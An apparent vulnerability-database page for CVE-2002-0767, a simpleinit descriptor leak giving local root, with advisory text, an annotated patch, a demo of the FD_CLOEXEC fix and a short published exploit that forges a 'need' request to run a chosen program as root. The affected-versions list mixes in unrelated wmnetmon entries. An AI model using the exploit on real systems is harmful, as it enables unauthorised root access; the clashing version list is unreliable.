CVE-2002-0767
CVSS 7.2
Published: 2002-08-12 00:00:00
Revised: 2008-09-05 16:28:53

[Original] simpleinit on Linux systems does not close a read/write FIFO file descriptor before creating a child process, which allows the child process to cause simpleinit to execute arbitrary programs with root privileges.


[CNNVD] Richard Gooch SimpleInit Open File Descriptor Vulnerability (CNNVD-200208-088)

        simpleinit on Linux does not close its read/write FIFO file descriptor before creating a child process. A child process can use the inherited descriptor to make simpleinit execute arbitrary programs with root privileges.

- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can render the system completely unavailable]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0767
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0767
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-088
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5001
(VENDOR_ADVISORY)  BID  5001
http://www.iss.net/security_center/static/9357.php
(VENDOR_ADVISORY)  XF  simpleinit-file-descriptor-open(9357)
http://online.securityfocus.com/archive/1/276739
(VENDOR_ADVISORY)  BUGTRAQ  20020613 simpleinit root exploit - file descriptor left open

- Vulnerability information

Richard Gooch SimpleInit Open File Descriptor Vulnerability
High   Design Error
2002-08-12 00:00:00 2005-10-20 00:00:00
Local
        simpleinit on Linux does not close its read/write FIFO file descriptor before creating a child process. A child process can use the inherited descriptor to make simpleinit execute arbitrary programs with root privileges.

- Advisories and patches

        An unofficial patch has been provided by Patrick Smith:
        --- login-utils/simpleinit.c.orig 2001-09-29 11:09:10.000000000 -0400
        +++ login-utils/simpleinit.c 2002-05-23 22:16:07.000000000 -0400
        @@ -203,6 +203,18 @@
         if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 )
         err ( _("error opening fifo\n") );
         }
        + if ( initctl_fd >= 0 )
        + if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {
        + err ( _("error setting close-on-exec on /dev/initctl") );
        + /* Can the fcntl ever fail? If it does, and we leave
        + the descriptor open in child processes, then any
        + process on the system will be able to write to
        + /dev/initctl and have us execute arbitrary commands
        + as root. So let's refuse to use the fifo in this
        + case. */
        + close(initctl_fd);
        + initctl_fd = -1;
        + }
        if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();
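Review bot: `fcntl (initctl_fd, F_SETFD, FD_CLOEXEC)` replaces the descriptor's whole flag word instead of OR-ing into it; that is harmless today only because FD_CLOEXEC is the sole fd flag, and the conventional form is `fcntl (initctl_fd, F_SETFD, fcntl (initctl_fd, F_GETFD) | FD_CLOEXEC)` with the F_GETFD result checked. More importantly, close-on-exec only takes effect at exec(): between fork() and exec() every child still holds initctl_fd, and there is a window between the open() above and this fcntl() in which a fork would leak the descriptor. Both are acceptable here only because simpleinit is single-threaded and does not fork between the two calls, so that assumption belongs in the comment; on kernels that support it, passing O_CLOEXEC in the open() flags removes the window entirely.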
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (21538)

Richard Gooch SimpleInit 2.0.2 Open File Descriptor Vulnerability (EDBID:21538)
Platform: linux   Type: local
Date: 2002-06-12   Verified
Author: Patrick Smith
source: http://www.securityfocus.com/bid/5001/info

A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser.

The vulnerability occurs because simpleinit may allow some child processes to inherit a file descriptor with read-write access. The file descriptor is used to access /dev/initctl and this descriptor is normally used by 'initctl', 'need' and 'provide' programs to pass instructions to simpleinit. The simpleinit process runs with root privileges.

A local user whose process inherits this file descriptor will be able to cause simpleinit to execute commands as the superuser.

/* Patrick Smith's simpleinit exploit as posted to Bugtraq (2002). It must run
 * in a process descended from simpleinit (for example via the getty/login
 * chain) that inherited the read/write descriptor to /dev/initctl. simpleinit
 * has only fds 0-2 open when it opens the FIFO, so the leaked descriptor is
 * normally fd 3, the value hard-coded below. A 'need' request names a program
 * for simpleinit to run, and simpleinit runs it as root. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#include "simpleinit.h"  /* From the util-linux source (login-utils/): provides
                            COMMAND_SIZE, COMMAND_NEED and struct command_struct */

int main(void)
{
   int fd = 3;                        /* the inherited /dev/initctl descriptor */
   struct stat st;
   char buf[COMMAND_SIZE];
   struct command_struct* cmd = (struct command_struct*) buf;

   /* Sanity check before writing blindly: only proceed if fd 3 is a FIFO. */
   if (fstat(fd, &st) != 0 || !S_ISFIFO(st.st_mode)) {
      fprintf(stderr, "fd %d is not an inherited FIFO, nothing to exploit\n", fd);
      return 1;
   }

   /* Forge the request that the 'need' helper would normally send. */
   memset(buf, '\0', sizeof(buf));
   cmd->command = COMMAND_NEED;
   cmd->pid = 17;                     /* arbitrary values from the original exploit */
   cmd->ppid = 16;
   strcpy(cmd->name, "/home/pat/x/foo");  /* foo will be run as root */

   if (write(fd, buf, COMMAND_SIZE) != COMMAND_SIZE) {
      perror("write to /dev/initctl");
      return 1;
   }
   return 0;
}

- Vulnerability information

14437
simpleinit File Descriptor Child Process Arbitrary Command Execution

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-06-13 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Richard Gooch SimpleInit Open File Descriptor Vulnerability
Class: Design Error   BugTraq ID: 5001
Remote: No   Local: Yes
Published: 2002-06-12 12:00:00   Updated: 2009-07-11 01:56:00
Credited to Patrick Smith <patsmith@pobox.com>.

- Affected program versions

Richard Gooch simpleinit 2.0.2
+ util-linux util-linux 2.11 r
Alvaro Lopes wmnetmon 0.2 p4-gnomepanelsupport
Alvaro Lopes wmnetmon 0.2 p3
Alvaro Lopes wmnetmon 0.2 p2
Alvaro Lopes wmnetmon 0.2 p1
Alvaro Lopes wmnetmon 0.2
Alvaro Lopes wmnetmon 0.2 p5

- Unaffected program versions

Alvaro Lopes wmnetmon 0.2 p5

- Vulnerability discussion

A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser.

The vulnerability occurs because simpleinit may allow some child processes to inherit a file descriptor with read-write access. The file descriptor is used to access /dev/initctl and this descriptor is normally used by 'initctl', 'need' and 'provide' programs to pass instructions to simpleinit. The simpleinit process runs with root privileges.

A local user whose process inherits this file descriptor will be able to cause simpleinit to execute commands as the superuser.
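The mechanism described in this discussion (and in the EDB 21538 listing earlier on this page) comes down to one rule: a descriptor that a privileged process leaves open survives fork() and exec(), and the child can use it without ever passing the permission check on the FIFO's path. The C program below is an added example written for this page; it is not code from util-linux, the advisory, or Patrick Smith's exploit. It creates its own FIFO under /tmp as a stand-in for /dev/initctl, opens it read/write the way simpleinit does, then forks a child that exec()s /bin/sh and tries to push a fake "need" request through the inherited descriptor; it then runs the same scenario with the fix from the unofficial patch (FD_CLOEXEC via fcntl) applied. The temporary path, the command text and all function names are constructed for the demonstration.

```c
/* Added example for this page; not from util-linux or the original advisory.
 * Reproduces the CVE-2002-0767 bug class and its fix: a "daemon" opens a
 * control FIFO O_RDWR, then fork()s a child that exec()s a shell. Without
 * FD_CLOEXEC the child inherits the descriptor and can write commands into
 * the FIFO without ever hitting the permission check on its path. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Mark fd close-on-exec while preserving other descriptor flags. The patch on
 * this page passes a bare FD_CLOEXEC to F_SETFD, which is only safe because
 * FD_CLOEXEC is currently the sole fd flag. Returns 0 on success, -1 on error. */
int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* The check a child should make before writing blindly to "fd 3". */
int fd_is_fifo(int fd)
{
    struct stat st;
    return fstat(fd, &st) == 0 && S_ISFIFO(st.st_mode);
}

/* fork(), exec() /bin/sh, and have the child try to write a fake "need"
 * request through descriptor fd. 1 = write succeeded (descriptor leaked),
 * 0 = the shell found fd closed, -1 = fork/wait failed. */
static int child_can_write(int fd)
{
    char script[96];
    /* Silence the shell's "Bad file descriptor" message on the sealed run. */
    snprintf(script, sizeof script,
             "exec 2>/dev/null; echo need /tmp/evil >&%d", fd);
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", script, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

/* Run the scenario once: cloexec == 0 reproduces the vulnerable simpleinit,
 * cloexec == 1 applies the fix. Returns 1 if the child's command reached the
 * FIFO, 0 if the descriptor was closed across exec(), -1 on setup failure. */
int run_scenario(int cloexec)
{
    char dir[] = "/tmp/initctl-demo.XXXXXX";  /* constructed stand-in location */
    char path[sizeof dir + 16];
    int fd = -1, result = -1;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/initctl", dir);
    if (mkfifo(path, 0600) != 0)
        goto out;
    /* O_RDWR on a FIFO does not block on Linux; simpleinit opens it this way. */
    fd = open(path, O_RDWR);
    if (fd < 0 || !fd_is_fifo(fd))
        goto out;
    if (cloexec && set_cloexec(fd) != 0)
        goto out;

    result = child_can_write(fd);
    if (result == 1) {
        /* Read the forged request back the way the daemon would; this proves
         * the unprivileged child really reached the control channel. */
        char buf[64] = {0};
        ssize_t n = read(fd, buf, sizeof buf - 1);
        if (n <= 0 || strncmp(buf, "need /tmp/evil", 14) != 0)
            result = -1;
    }
out:
    if (fd >= 0)
        close(fd);
    unlink(path);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("without FD_CLOEXEC, child reached the FIFO: %d\n", run_scenario(0));
    printf("with FD_CLOEXEC,    child reached the FIFO: %d\n", run_scenario(1));
    return 0;
}
```

Build with `cc -o fdleak_demo fdleak_demo.c` and run as an ordinary user: the first line reports 1 (the child's request arrived in the FIFO even though it was opened 0600 by the parent), the second reports 0. Nothing in the child ever touches the FIFO's path, which is why file permissions on /dev/initctl were no defence against this bug; the only effective control is the descriptor flag set before the child is created.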

- Exploit

The following exploit has been provided by Patrick Smith <patsmith@pobox.com>:

- Solution

An unofficial patch has been provided by Patrick Smith <patsmith@pobox.com>:

--- login-utils/simpleinit.c.orig 2001-09-29 11:09:10.000000000 -0400
+++ login-utils/simpleinit.c 2002-05-23 22:16:07.000000000 -0400
@@ -203,6 +203,18 @@
if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 )
err ( _("error opening fifo\n") );
}
+ if ( initctl_fd >= 0 )
+ if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {
+ err ( _("error setting close-on-exec on /dev/initctl") );
+ /* Can the fcntl ever fail? If it does, and we leave
+ the descriptor open in child processes, then any
+ process on the system will be able to write to
+ /dev/initctl and have us execute arbitrary commands
+ as root. So let's refuse to use the fifo in this
+ case. */
+ close(initctl_fd);
+ initctl_fd = -1;
+ }

if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();
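Review bot: the outer `if ( initctl_fd >= 0 )` has no braces around a braced inner `if`, which is easy to misread and easy to break when a statement is added later; fold the two into one condition, `if ( initctl_fd >= 0 && fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {`, or brace the outer `if`. Two smaller points in the same hunk: the new message `err ( _("error setting close-on-exec on /dev/initctl") )` lacks the trailing `\n` that the neighbouring `err ( _("error opening fifo\n") )` has, and it hard-codes /dev/initctl where the open() above uses `initctl_name`. The recovery path (close and `initctl_fd = -1`) relies on err() returning and on every later reader of initctl_fd tolerating -1; the open-failure path just above already leaves it negative, so that contract exists, but it is worth stating in the comment.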

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.



- Related references


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.